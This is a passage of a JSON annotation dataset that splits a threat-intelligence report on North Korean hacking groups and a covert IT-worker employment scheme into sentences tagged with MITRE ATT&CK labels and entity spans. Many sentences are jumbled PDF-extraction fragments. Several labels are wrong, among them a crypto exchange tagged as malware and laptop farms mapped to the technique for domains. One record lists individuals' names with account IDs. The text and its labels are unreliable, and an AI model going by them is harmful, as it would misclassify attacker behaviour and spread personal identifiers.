"end": 53, "label": "ThreatActor" }, { "text": "Lazarus Group", "start": 201, "end": 214, "label": "ThreatActor" }, { "text": "serving as ", "start": 79, "end": 90, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p29-s238-b6b9b7", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 29, "sentence_id": 238, "context_before": "This group is arguably the most critical within DPRK WORKFORCEcyber operations—serving as the Swiss Army knife IT of the regime’s cyber capabilities and the primary HIDDEN entity behind the conflated “Lazarus Group” label.", "sentence_text": "AND SYNDICATE CYBER DPRK’S EXPOSING", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p30-s239-d74cff", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 30, "sentence_id": 239, "context_before": "AND SYNDICATE CYBER DPRK’S EXPOSING", "sentence_text": "Although this organization shares the same mission focus as the MSS, it is likely to be comprised of multiple organizations.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p30-s240-0ac4ff", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 30, "sentence_id": 240, "context_before": "Although this organization shares the same mission focus as the MSS, it is likely to be comprised of multiple organizations.", "sentence_text": "APT37 employs sophisticated tactics such as exploiting zero-day vulnerabilities and utilizing custom malware to conduct espionage and intelligence-gathering missions.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" }, { "id": "T1588", "name": "Obtain Capabilities" } ], "procedure": "Exploits zero-day vulnerabilities and uses custom malware for espionage", "entities": [ { "text": "APT37 ", "start": 0, "end": 6, "label": "ThreatActor" }, { "text": "custom malware", "start": 94, "end": 108, "label": "MalwareTool" }, { "text": " zero-day vulnerabilities", "start": 54, "end": 79, "label": "Infrastructure_Indicator" }, { "text": "utilizing ", "start": 84, "end": 94, "label": "Action" }, { "text": "exploiting ", "start": 44, "end": 55, "label": "Action" }, { "text": " conduct espionage ", "start": 111, "end": 130, "label": "Action" }, { "text": "intelligence-gathering", "start": 134, "end": 156, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p30-s241-d945d2", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 30, "sentence_id": 241, "context_before": "APT37 employs sophisticated tactics such as exploiting zero-day vulnerabilities and utilizing custom malware to conduct espionage and intelligence-gathering missions.", "sentence_text": "Notably, in 2018, APT37 conducted a spear-phishing campaign targeting North Korean defectors and South Korean journalists, employing malware with wiretapping capabilities to monitor victims’ activities.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1566.001", "name": "Spearphishing Attachment" }, { "id": "T1119", "name": "Automated Collection" } ], "procedure": "Conducted spear-phishing campaign targeting defectors and journalists with wiretapping malware", "entities": [ { "text": "APT37 ", "start": 18, "end": 24, "label": "ThreatActor" }, { "text": "spear-phishing ", "start": 36, "end": 51, "label": "Action" }, { "text": "malware with wiretapping capabilities", "start": 133, "end": 170, "label": "MalwareTool" }, { "text": "North Korean defectors ", "start": 70, "end": 93, "label": "Infrastructure_Indicator" }, { "text": " South Korean journalists", "start": 96, "end": 121, "label": "Infrastructure_Indicator" }, { "text": "targeting ", "start": 60, "end": 70, "label": "Action" }, { "text": "monitor ", "start": 174, "end": 182, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p30-s242-1840c0", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 30, "sentence_id": 242, "context_before": "Notably, in 2018, APT37 conducted a spear-phishing campaign targeting North Korean defectors and South Korean journalists, employing malware with wiretapping capabilities to monitor victims’ activities.", "sentence_text": "These operations underscore APT37’s focus on surveilling and disrupting activities related to North Korean defectors and human rights advocates.", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" }, { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1651", "name": "Cloud Administration Command" } ], "procedure": "Surveils and disrupts activities of North Korean defectors and human rights advocates", "entities": [ { "text": "APT37", "start": 28, "end": 33, "label": "ThreatActor" }, { "text": "North Korean defectors", "start": 94, "end": 116, "label": "Infrastructure_Indicator" }, { "text": "human rights advocates", "start": 121, "end": 143, "label": "Infrastructure_Indicator" }, { "text": "surveilling ", "start": 45, "end": 57, "label": "Action" }, { "text": "disrupting ", "start": 61, "end": 72, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p30-s243-6ee8bb", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 30, "sentence_id": 243, "context_before": "These operations underscore APT37’s focus on surveilling and disrupting activities related to North Korean defectors and human rights advocates.", "sentence_text": "WORKFORCE\nIT\nHIDDEN\nAND\nSYNDICATE\nCYBER\nDPRK’S\nEXPOSING", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p31-s244-f05c0c", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 31, "sentence_id": 244, "context_before": "WORKFORCE\nIT\nHIDDEN\nAND\nSYNDICATE\nCYBER\nDPRK’S\nEXPOSING", "sentence_text": "The IT Worker Mission North Korea probably has several thousand IT workers who operate from both inside and outside of North Korea.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1583", "name": "Acquire Infrastructure" } ], "procedure": "Operates thousands of IT workers from inside and outside the country", "entities": [ { "text": " North Korea", "start": 118, "end": 130, "label": "ThreatActor" }, { "text": "operate ", "start": 79, "end": 87, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p31-s245-b36d38", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 31, "sentence_id": 245, "context_before": "The IT Worker Mission North Korea probably has several thousand IT workers who operate from both inside and outside of North Korea.", "sentence_text": "ITW (a.k.a. UNC5267, Wagemole)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p31-s246-19dd73", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 31, "sentence_id": 246, "context_before": "ITW (a.k.a. UNC5267, Wagemole)", "sentence_text": "A global network of IT professionals to clandestinely generate substantial revenue for its regime, circumventing international sanctions.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1583", "name": "Acquire Infrastructure" } ], "procedure": "Uses global IT professional network to generate revenue and circumvent sanctions", "entities": [ { "text": "global network", "start": 2, "end": 16, "label": "Infrastructure_Indicator" }, { "text": " generate substantial revenue", "start": 53, "end": 82, "label": "Action" }, { "text": " circumventing international sanctions", "start": 98, "end": 136, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p31-s247-0912cb", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 31, "sentence_id": 247, "context_before": "A global network of IT professionals to clandestinely generate substantial revenue for its regime, circumventing international sanctions.", "sentence_text": "These operatives secure remote freelance positions with companies worldwide by misrepresenting their identities and locations, often utilizing stolen or falsified credentials.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1585", "name": "Establish Accounts" } ], "procedure": "Secures remote freelance positions by misrepresenting identity and using stolen/falsified credentials", "entities": [ { "text": "stolen or falsified credentials", "start": 143, "end": 174, "label": "Infrastructure_Indicator" }, { "text": "secure remote freelance positions", "start": 17, "end": 50, "label": "Action" }, { "text": "misrepresenting ", "start": 79, "end": 95, "label": "Action" }, { "text": "utilizing ", "start": 133, "end": 143, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p31-s248-835e49", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 31, "sentence_id": 248, "context_before": "These operatives secure remote freelance positions with companies worldwide by misrepresenting their identities and locations, often utilizing stolen or falsified credentials.", "sentence_text": "To facilitate these deceptions, intermediaries have established “laptop farms” within the U.S., hosting employer-provided devices to create the illusion of domestic work locations for overseas North Korean workers.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1583.001", "name": "Domains" } ], "procedure": "Establishes laptop farms in the U.S. to create illusion of domestic work locations", "entities": [ { "text": "North Korean workers", "start": 193, "end": 213, "label": "ThreatActor" }, { "text": "laptop farms", "start": 65, "end": 77, "label": "Infrastructure_Indicator" }, { "text": "U.S.", "start": 90, "end": 94, "label": "Infrastructure_Indicator" }, { "text": "established ", "start": 52, "end": 64, "label": "Action" }, { "text": " create the illusion", "start": 132, "end": 152, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p31-s249-6d21b4", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 31, "sentence_id": 249, "context_before": "To facilitate these deceptions, intermediaries have established “laptop farms” within the U.S., hosting employer-provided devices to create the illusion of domestic work locations for overseas North Korean workers.", "sentence_text": "WORKFORCE IT Chinyong IT Cooperation Company HIDDEN Chinyong is one of many North Korean IT organizations and has been active since at least AND2016.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p31-s250-cfbfc7", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 31, "sentence_id": 250, "context_before": "WORKFORCE IT Chinyong IT Cooperation Company HIDDEN Chinyong is one of many North Korean IT organizations and has been active since at least AND2016.", "sentence_text": "According to CYBERblockchain analysis, Chinyong ITW have stolen and earned tens of millions in cryptocurrency since 2017.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1657", "name": "Financial Theft" } ], "procedure": "Stolen and earned tens of millions in cryptocurrency", "entities": [ { "text": "Chinyong ITW", "start": 39, "end": 51, "label": "ThreatActor" }, { "text": "stolen ", "start": 57, "end": 64, "label": "Action" }, { "text": "earned ", "start": 68, "end": 75, "label": "Action" }, { "text": "cryptocurrency ", "start": 95, "end": 110, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-79_mitre_report-p31-s251-ffd5ef", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 31, "sentence_id": 251, "context_before": "According to CYBERblockchain analysis, Chinyong ITW have stolen and earned tens of millions in cryptocurrency since 2017.", "sentence_text": "DPRK’S EXPOSING", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p32-s252-777fc9", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 32, "sentence_id": 252, "context_before": "DPRK’S EXPOSING", "sentence_text": "Gwisin Gang threat actors pose as recruiters to target software developers, particularly in the cryptocurrency sector.", "relevant": "yes", "tactic": [ { "id": "TA0043", "name": "Reconnaissance" } ], "techniques": [ { "id": "T1589", "name": "Gather Victim Identity Information" } ], "procedure": "Poses as recruiters to target software developers in cryptocurrency sector", "entities": [ { "text": "Gwisin Gang", "start": 0, "end": 11, "label": "ThreatActor" }, { "text": "cryptocurrency sector", "start": 96, "end": 117, "label": "Infrastructure_Indicator" }, { "text": "pose as recruiters", "start": 26, "end": 44, "label": "Action" }, { "text": "target ", "start": 48, "end": 55, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p32-s253-f48518", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 32, "sentence_id": 253, "context_before": "Gwisin Gang threat actors pose as recruiters to target software developers, particularly in the cryptocurrency sector.", "sentence_text": "To further the point of deconfliction of targets, open-source information indicates that these actors were also targeting Bybit at the same time as TraderTraitor in early 2025.", "relevant": "yes", "tactic": [ { "id": "TA0043", "name": "Reconnaissance" } ], "techniques": [ { "id": "T1591", "name": "Gather Victim Org Information" } ], "procedure": "Targeted Bybit cryptocurrency exchange", "entities": [ { "text": "TraderTraitor ", "start": 148, "end": 162, "label": "ThreatActor" }, { "text": "Bybit ", "start": 122, "end": 128, "label": "MalwareTool" }, { "text": "targeting ", "start": 112, "end": 122, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p32-s254-75fcd9", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 32, "sentence_id": 254, "context_before": "To further the point of deconfliction of targets, open-source information indicates that these actors were also targeting Bybit at the same time as TraderTraitor in early 2025.", "sentence_text": "Figures 9 and 10 detail IT worker operations as one IT worker creates altered IDs and the persona “Benjamin” from the start to finish.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1585", "name": "Establish Accounts" } ], "procedure": "Creates altered IDs and persona \"Benjamin\"", "entities": [ { "text": " IT worker", "start": 23, "end": 33, "label": "ThreatActor" }, { "text": "altered IDs ", "start": 70, "end": 82, "label": "Infrastructure_Indicator" }, { "text": " persona “Benjamin” ", "start": 89, "end": 109, "label": "Infrastructure_Indicator" }, { "text": "creates ", "start": 62, "end": 70, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p32-s255-e0a18b", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 32, "sentence_id": 255, "context_before": "Figures 9 and 10 detail IT worker operations as one IT worker creates altered IDs and the persona “Benjamin” from the start to finish.", "sentence_text": "WORKFORCE IT HIDDEN AND SYNDICATE CYBER DPRK’S EXPOSING", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p33-s256-9e8132", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 33, "sentence_id": 256, "context_before": "WORKFORCE IT HIDDEN AND SYNDICATE CYBER DPRK’S EXPOSING", "sentence_text": "WORKFORCE\nIT\nHIDDEN\nAND\nSYNDICATE\nCYBER\nDPRK’S\nEXPOSING", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p34-s257-54f6f2", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 34, "sentence_id": 257, "context_before": "WORKFORCE\nIT\nHIDDEN\nAND\nSYNDICATE\nCYBER\nDPRK’S\nEXPOSING", "sentence_text": "Name Netkey_ID Room no.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p34-s258-24e380", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 34, "sentence_id": 258, "context_before": "Name Netkey_ID Room no.", "sentence_text": "Belong to ChaeJuHyok stack4world21 409 313 HanGukPeom", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p34-s259-ef76f5", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 34, "sentence_id": 259, "context_before": "Belong to ChaeJuHyok stack4world21 409 313 HanGukPeom", "sentence_text": "hgtiger0620 409 313 RiSongHyok developer123 409 313 HongKangJin achilles0314 409 313 WuangUnRyong wur20011125 409 Educ SonSuBok ssb2428 409 Educ JoHeon jh1107 409 Educ PaekUnHyok puh20020519 409 Educ KimYongBeom kyb0614 409 Other RiKumSong rks2002 409 Other OmChungGuk challenger 409 Educ 34 LiMyongSong lms361244 409 Other IT HIDDEN AND SYNDICATE CYBER DPRK’S EXPOSING", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p35-s260-f16754", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 35, "sentence_id": 260, "context_before": "hgtiger0620 409 313 RiSongHyok developer123 409 313 HongKangJin achilles0314 409 313 WuangUnRyong wur20011125 409 Educ SonSuBok ssb2428 409 Educ JoHeon jh1107 409 Educ PaekUnHyok puh20020519 409 Educ KimYongBeom kyb0614 409 Other RiKumSong rks2002 409 Other OmChungGuk challenger 409 Educ 34 LiMyongSong lms361244 409 Other IT HIDDEN AND SYNDICATE CYBER DPRK’S EXPOSING", "sentence_text": "In Focus: IT Workers VICTIM Prepare job seekers for SKILL SOCIAL ENG.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p35-s261-fd9068", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 35, "sentence_id": 261, "context_before": "In Focus: IT Workers VICTIM Prepare job seekers for SKILL SOCIAL ENG.", "sentence_text": "roles and tailor skillsets Identity Theft TRAINERS SPECIALISTS for interviews.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p35-s262-7d1cfb", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 35, "sentence_id": 262, "context_before": "roles and tailor skillsets Identity Theft TRAINERS SPECIALISTS for interviews.", "sentence_text": "Victims/ Facilitators FACILITATORS CREDENTIAL JOB (RECRUITMENT) FORGERS SEEKERS ‘OVEREMPLOYMENT’ COMMUNITY Fake Identity Established subculture Issued of individuals working multiple jobs and sharing tradecraft and VDI FACILITATORS intelligence on specific Interview (LAPTOP FARM)", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1585", "name": "Establish Accounts" }, { "id": "T1587", "name": "Develop Capabilities" } ], "procedure": "Forges identities and shares tradecraft for overemployment using VDI and laptop farms", "entities": [ { "text": " Fake Identity", "start": 106, "end": 120, "label": "Infrastructure_Indicator" }, { "text": "VDI ", "start": 215, "end": 219, "label": "Infrastructure_Indicator" }, { "text": "LAPTOP FARM", "start": 267, "end": 278, "label": "Infrastructure_Indicator" }, { "text": "FORGERS ", "start": 64, "end": 72, "label": "Action" }, { "text": "sharing tradecraft ", "start": 192, "end": 211, "label": "Action" }, { "text": " working multiple jobs", "start": 165, "end": 187, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p35-s263-691920", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 35, "sentence_id": 263, "context_before": "Victims/ Facilitators FACILITATORS CREDENTIAL JOB (RECRUITMENT) FORGERS SEEKERS ‘OVEREMPLOYMENT’ COMMUNITY Fake Identity Established subculture Issued of individuals working multiple jobs and sharing tradecraft and VDI FACILITATORS intelligence on specific Interview (LAPTOP FARM)", "sentence_text": "Compromise companies and how to Stage evade detection.\nAppears to be a key Use of GenAI This may be an Once candidates are hired, community for active for “Assisted” iterative process facilitators supply equipment to recruitment campaigns.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" }, { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1585", "name": "Establish Accounts" }, { "id": "T1587", "name": "Develop Capabilities" }, { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "Uses GenAI and facilitator networks to compromise companies, evade detection, and run recruitment campaigns", "entities": [ { "text": "GenAI ", "start": 82, "end": 88, "label": "MalwareTool" }, { "text": "Compromise companies", "start": 0, "end": 20, "label": "Action" }, { "text": "evade detection", "start": 38, "end": 53, "label": "Infrastructure_Indicator" }, { "text": "supply equipment", "start": 197, "end": 213, "label": "Infrastructure_Indicator" }, { "text": "recruitment campaigns", "start": 217, "end": 238, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-79_mitre_report-p35-s264-3c204f", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 35, "sentence_id": 264, "context_before": "Compromise companies and how to Stage evade detection.\nAppears to be a key Use of GenAI This may be an Once candidates are hired, community for active for “Assisted” iterative process facilitators supply equipment to recruitment campaigns.", "sentence_text": "Interviewing the job seekers through various proxies to mask location.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1090", "name": "Proxy" } ], "procedure": "Interviews job seekers through proxies to mask location", "entities": [ { "text": "proxies ", "start": 45, "end": 53, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-79_mitre_report-p35-s265-e92cb0", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 35, "sentence_id": 265, "context_before": "Interviewing the job seekers through various proxies to mask location.", "sentence_text": "fraudulent employee.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p35-s266-a421bc", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 35, "sentence_id": 266, "context_before": "fraudulent employee.", "sentence_text": "by separate Project Managers.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p35-s267-80e45e", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 35, "sentence_id": 267, "context_before": "by separate Project Managers.", "sentence_text": "Video REMOTE ACCESS Streaming TOOLKIT WORKFORCE IT Financial PROJECT PAYMENT HIDDEN MANAGERS FACILITATORS Account Applications* AND Transfer payments SYNDICATE MONEY LAUNDERERS CYBER DPRK ORIGIN ROLES CRYPTO SPECIALISTS DPRK’S", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" }, { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1657", "name": "Financial Theft" }, { "id": "T1090", "name": "Proxy" } ], "procedure": "Uses remote access toolkits and crypto specialists for payment transfers and money laundering", "entities": [ { "text": "DPRK ", "start": 183, "end": 188, "label": "ThreatActor" }, { "text": "Video REMOTE ACCESS Streaming TOOLKIT ", "start": 0, "end": 38, "label": "Infrastructure_Indicator" }, { "text": "CRYPTO ", "start": 201, "end": 208, "label": "Infrastructure_Indicator" }, { "text": "MONEY LAUNDERERS", "start": 160, "end": 176, "label": "Action" }, { "text": "Transfer payments", "start": 132, "end": 149, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p35-s268-02e246", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 35, "sentence_id": 268, "context_before": "Video REMOTE ACCESS Streaming TOOLKIT WORKFORCE IT Financial PROJECT PAYMENT HIDDEN MANAGERS FACILITATORS Account Applications* AND Transfer payments SYNDICATE MONEY LAUNDERERS CYBER DPRK ORIGIN ROLES CRYPTO SPECIALISTS DPRK’S", "sentence_text": "INTERNATIONAL FACILITATORS", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p36-s269-03c104", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 36, "sentence_id": 269, "context_before": "INTERNATIONAL FACILITATORS", "sentence_text": "The methodology flow stems from a revenue-generating IT worker (ITW) team.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1583", "name": "Acquire Infrastructure" } ], "procedure": "Generates revenue through IT worker team operations", "entities": [ { "text": "ITW", "start": 64, "end": 67, "label": "ThreatActor" }, { "text": "revenue-generating", "start": 34, "end": 52, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p36-s270-8c9f69", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 36, "sentence_id": 270, "context_before": "The methodology flow stems from a revenue-generating IT worker (ITW) team.", "sentence_text": "While this instance was derived from DTEX investigations focused on revenue motives, the framework applies equally to teams driven by intellectual property theft or espionage.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p36-s271-923b69", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 36, "sentence_id": 271, "context_before": "While this instance was derived from DTEX investigations focused on revenue motives, the framework applies equally to teams driven by intellectual property theft or espionage.", "sentence_text": "It uncovers key intricacies often overlooked by defenders and highlights the criminal nature of these operations.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p36-s272-6dc239", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 36, "sentence_id": 272, "context_before": "It uncovers key intricacies often overlooked by defenders and highlights the criminal nature of these operations.", "sentence_text": "Facilitators (Recruiters): English-speaking freelancers.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p36-s273-b4205c", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 36, "sentence_id": 273, "context_before": "Facilitators (Recruiters): English-speaking freelancers.", "sentence_text": "Several DTEX i3 investigations reveal active recruitment of English-speaking technical freelancers who may knowingly or unknowingly support job seeker and video interview stages.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1585", "name": "Establish Accounts" } ], "procedure": "Recruits English-speaking freelancers to support job seeker and video interview stages", "entities": [ { "text": " English-speaking technical freelancers", "start": 59, "end": 98, "label": "Infrastructure_Indicator" }, { "text": "recruitment ", "start": 45, "end": 57, "label": "Action" }, { "text": "support ", "start": 132, "end": 140, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p36-s274-457726", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 36, "sentence_id": 274, "context_before": "Several DTEX i3 investigations reveal active recruitment of English-speaking technical freelancers who may knowingly or unknowingly support job seeker and video interview stages.", "sentence_text": "Facilitators (Laptop Farm): Non-DPRK representatives (e.g., U.S. citizens or front companies).", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1583", "name": "Acquire Infrastructure" } ], "procedure": "Uses non-DPRK representatives for laptop farm operations", "entities": [ { "text": "Laptop Farm", "start": 14, "end": 25, "label": "Infrastructure_Indicator" }, { "text": "U.S. citizens ", "start": 60, "end": 74, "label": "Infrastructure_Indicator" }, { "text": "front companies", "start": 77, "end": 92, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-79_mitre_report-p36-s275-1e065f", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 36, "sentence_id": 275, "context_before": "Facilitators (Laptop Farm): Non-DPRK representatives (e.g., U.S. citizens or front companies).", "sentence_text": "DTEX i3 has observed incidents where video streaming services are leveraged WORKFORCE to facilitate multiple individuals being connected to the same company under a IT single account.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1036", "name": "Masquerading" } ], "procedure": "Leverages video streaming services to connect multiple individuals under single company account", "entities": [ { "text": "video streaming services", "start": 37, "end": 61, "label": "Infrastructure_Indicator" }, { "text": "facilitate ", "start": 89, "end": 100, "label": "Action" }, { "text": "connected ", "start": 127, "end": 137, "label": "Action" }, { "text": "leveraged ", "start": 66, "end": 76, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p36-s276-15ed3a", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 36, "sentence_id": 276, "context_before": "DTEX i3 has observed incidents where video streaming services are leveraged WORKFORCE to facilitate multiple individuals being connected to the same company under a IT single account.", "sentence_text": "HIDDEN Use of GenAI for “Assisted” Interviewing: Recruiters or skill trainers may promote the use of AND GenAI or deepfake tools to assist job seekers in the interview process.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1036", "name": "Masquerading" } ], "procedure": "Promotes use of GenAI/deepfake tools to assist in job interviews", "entities": [ { "text": "GenAI ", "start": 14, "end": 20, "label": "MalwareTool" }, { "text": "GenAI ", "start": 105, "end": 111, "label": "MalwareTool" }, { "text": "deepfake tools", "start": 114, "end": 128, "label": "MalwareTool" }, { "text": "promote ", "start": 82, "end": 90, "label": "Action" }, { "text": "assist ", "start": 132, "end": 139, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p36-s277-0f3a4f", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 36, "sentence_id": 277, "context_before": "HIDDEN Use of GenAI for “Assisted” Interviewing: Recruiters or skill trainers may promote the use of AND GenAI or deepfake tools to assist job seekers in the interview process.", "sentence_text": "This may be to help answer questions to back up the user’s fake resume or to help disguise the user’s physicalappearance to match the fake identity supplied to the organization.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1036", "name": "Masquerading" } ], "procedure": "Uses assistance tools to answer questions and disguise appearance to support fake identity", "entities": [ { "text": "fake resume ", "start": 59, "end": 71, "label": "Infrastructure_Indicator" }, { "text": "fake identity ", "start": 134, "end": 148, "label": "Infrastructure_Indicator" }, { "text": " help answer questions ", "start": 14, "end": 37, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p36-s278-de2e5f", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 36, "sentence_id": 278, "context_before": "This may be to help answer questions to back up the user’s fake resume or to help disguise the user’s physicalappearance to match the fake identity supplied to the organization.", "sentence_text": "SYNDICATE CYBER DPRK’S EXPOSING", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p37-s279-6bc71f", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 37, "sentence_id": 279, "context_before": "SYNDICATE CYBER DPRK’S EXPOSING", "sentence_text": "Interview Stage: The interview stage is crucial to embed job seekers into the organization without raising suspicion.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1078", "name": "Valid Accounts" } ], "procedure": "Embeds job seekers into organizations during interview stage", "entities": [ { "text": "embed ", "start": 51, "end": 57, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p37-s280-844cff", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 37, "sentence_id": 280, "context_before": "Interview Stage: The interview stage is crucial to embed job seekers into the organization without raising suspicion.", "sentence_text": "This will have to cover a few major requirements to prepare candidates for successful employment:\n• English speaking: Candidates must have a good English-speaking background to converse comfortably with interviewers in the U.S.\n• Technical knowledge: Candidates must have the right technical knowledge (as developed by skill trainers or identified through freelance platforms) for the job at hand •", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587", "name": "Develop Capabilities" } ], "procedure": "Prepares candidates with English and technical skills for employment interviews", "entities": [ { "text": "freelance platforms", "start": 356, "end": 375, "label": "Infrastructure_Indicator" }, { "text": " prepare candidates ", "start": 51, "end": 71, "label": "Action" }, { "text": "converse ", "start": 177, "end": 186, "label": "Action" }, { "text": "developed ", "start": 306, "end": 316, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p37-s281-d5d491", "source": "mitre", "doc_id": 